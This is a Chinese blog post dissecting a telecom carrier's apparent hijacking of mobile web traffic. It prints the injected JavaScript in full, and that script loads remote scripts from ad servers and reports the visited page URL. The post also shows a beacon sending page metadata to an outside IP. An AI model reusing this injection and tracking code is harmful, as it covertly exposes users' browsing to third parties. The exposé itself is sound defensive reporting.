登录   注册

分析一下我们这里的电信劫持套路

随心随笔 xlch 1年前 (2017-06-23) 2141次浏览 2个评论 扫描二维码

中国电信使用劫持方法投放广告,具体方法为:
浏览网站使用手机UA,就会劫持一个js文件,插入他的广告代码。

=======================================
以下为具体代码
=======================================

document.write('<script src="http://cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js?_x1498189203456127=Rise.of.the.Tomb.Raider|10"></script>');
if (typeof(_ctmd_time_65535) == "undefined" & amp; & amp; typeof(__ctmdia__65535) == "undefined") {
	var _ctmd_time_65535 = "1498189203_12756793_0B4C2AB2722D77E0CBD58BAEB3340261_456127";

	var __ctmdia__65535 = "2";
	function withjQuery65535(callback) {
		if (typeof(jQuery) == "undefined") {
			var head = document.getElementsByTagName('head')[0];
			var script = document.createElement('script');
			script.type = 'text/javascript';
			script.onload = script.onreadystatechange = function() {
				if (!this.readyState || this.readyState === "loaded" || this.readyState === "complete") {
					callback(jQuery);
					script.onload = script.onreadystatechange = null;
				}
			};
			script.src = "http://adx1.iq39.com:18181/js/jquery.min.js";
			head.appendChild(script);
		} else {
			callback(jQuery)
		}
	}

	function lzEncode65535(str) {
		var e = '',
		i = 0;
		for (i = 0; i & lt; str.length; i++) {
			if (str.charCodeAt(i) & gt; = 0 & amp; & amp; str.charCodeAt(i) & lt; = 255) {
				e = e + escape(str.charAt(i));
			} else {
				e = e + str.charAt(i);
			}
		}
		return e;
	}

	if (window.top == window.self) {
		_doc = window.document;
		window.setTimeout(function() {
			withjQuery65535(function($) {
				$(function() {
					 = $(_doc);
					if ($('.adMsgIh65535', ).size() == 0) {
						$('body', ).append('<div class="adMsgIh65535" style="width: 100%; height: 60px; position: fixed; right: 0px; bottom: 0px; display: block; z-index: 2147483647;"><div id="adStaticLog65535"></div><div style="display: none;"><script>var lainframe;</script> <script language="javascript" type="text/javascript" src="http://js.users.51.la/18939586.js"></script><img src="http://adx1.iq39.com:18181/log.js?t=1&amp;a=1025&amp;u=' + lzEncode65535(String(document.URL)) + '&amp;r=' + Math.random() + '&amp;w=' + _ctmd_time_65535 + '&amp;b=' + __ctmdia__65535 + '" /></div><div class="adMsgIc65535" style="position: absolute; right: 0px; top: 0px; z-index: 2147483647;"><a class="icMsgDiv65535"><img style="width: 16px; height: 15px; border: 0px;" src="http://adx1.iq39.com:18181/images/g.png" /></a></div><div style="position: absolute; left: 0px; bottom: 0px; z-index: 2147483647; width: 26px; height: 13px;"><img style="width: 26px; height: 13px; border: 0px;" src="http://adx1.iq39.com:18181/images/ad.gif" /></div>');
						var elUrlScript = document.createElement("script");
						elUrlScript.type = "text/javascript";
						elUrlScript.src = "http://js.kuaisouwifi.com/";
						document.getElementById("adStaticLog65535").appendChild(elUrlScript);
						$('.icMsgDiv65535', ).click(function() {
							$(this).parents('.adMsgIh65535').remove()
						});
						window.setTimeout(function() {
							$('.icMsgDiv65535', ).click()
						},
						60000);
					}
				});
			});
		},
		1000);
	} else {
		document.write('<script src="http://adx3.iq39.com:18181/ir.js?t=1025&u=m.bilibili.com/index.html"></script>');
	}
}


该劫持为随机性,也就是并不是每一次都会被劫持。

之后将会加载
http://js.kuaisouwifi.com/
这个文件,该文件继续加载
http://un.soarfi.cn/xay/10366.js?ydcp_id=10366&cumid=80-41-4e-3c-35-84&apmac=00267A2D5224
这个文件,该文件包含了悬浮广告的代码和窃取用户当前浏览页面信息的功能。

广告:
在页面上方显示百度联盟的广告
在页面下方悬浮gif图片广告,内容为“领红包、下载游戏”两项。
在页面右侧显示一个信息提示图标,点进去内容为“转盘领红包”。

点击进入右侧悬浮信息提示后,会出现一个转盘,页面url为:

http://activity.tuia.cn/activity/index?id=364&slotId=358&login=normal&appKey=49Gr28qN1TX5HNm3pSBhKvL1z2ep&deviceId=PMOJnMdahpowCqaBaep51498189146555&tenter=SOW&tck_rid_6c8=0a2f5cbdj487at2t-13438207&tck_loc_c5d=tactivity-364&dcm=401.358.0.5531&

点击转盘后奖品一直为“免息借贷”。
点击马上试用后,进入注册页面,下方显示

— Copyright ©2016 360 借条(上海淇毓信息科技有限公司)版权所有 —

搜集当前页面信息:
将用户当前浏览的页面的标题、描述、标签等信息,以及加载的js文件,发送到

http://180.76.162.60/ppt.gif

以下为一个例子

http://180.76.162.60/ppt.gif?viewport=true&keywords=bilibili,哔哩哔哩动画,动漫,电影,在线动漫,高清电影&description=bilibili是国内知名的在线视频弹幕网站,拥有最棒的ACG氛围,哔哩哔哩内容丰富多元,涵盖动漫、电影、二次元舞蹈视频、在线音乐、娱乐时尚、科技生活、鬼畜视频等。下载客户端还可离线下载电影、动漫。&title=哔哩哔哩移动版-( ゜- ゜)つロ干杯~ - bilbili-B站官网&bodyChildrenNum=33&iframeNum=0&referrer=http://www.bilibili.com/index.html&cid=__so__8pnwh349q1x1lasvj4pnidx6r1498189205631&baiduId=&codeId=10366&jsTime=1498189206171

可以看出将当前网站的信息全部都发送到了对方的服务器ip上。

相关信息:
域名:
tuia.cn
l2.soarfi.cn 解析ip地址:180.76.129.190
l1.soarfi.cn 解析ip地址:180.76.163.245
un.soarfi.cn 解析ip地址:59.49.40.35
yun.duiba.com.cn

IP:
180.76.162.60

截图:

 


绚丽彩虹 , 版权所有丨如未注明 , 均为原创丨未经允许,禁止转载
喜欢 (5)
[pay3@xlch8.cn]
分享 (0)

您必须 登录 才能发表评论!

(2)个小伙伴在吐槽
  1. HTTPS能否防止被劫持?我记得好像有说把页面装进iframe来加持的😂
    Meet2017-07-12 20:36 Linux | Chrome 11.0.696.34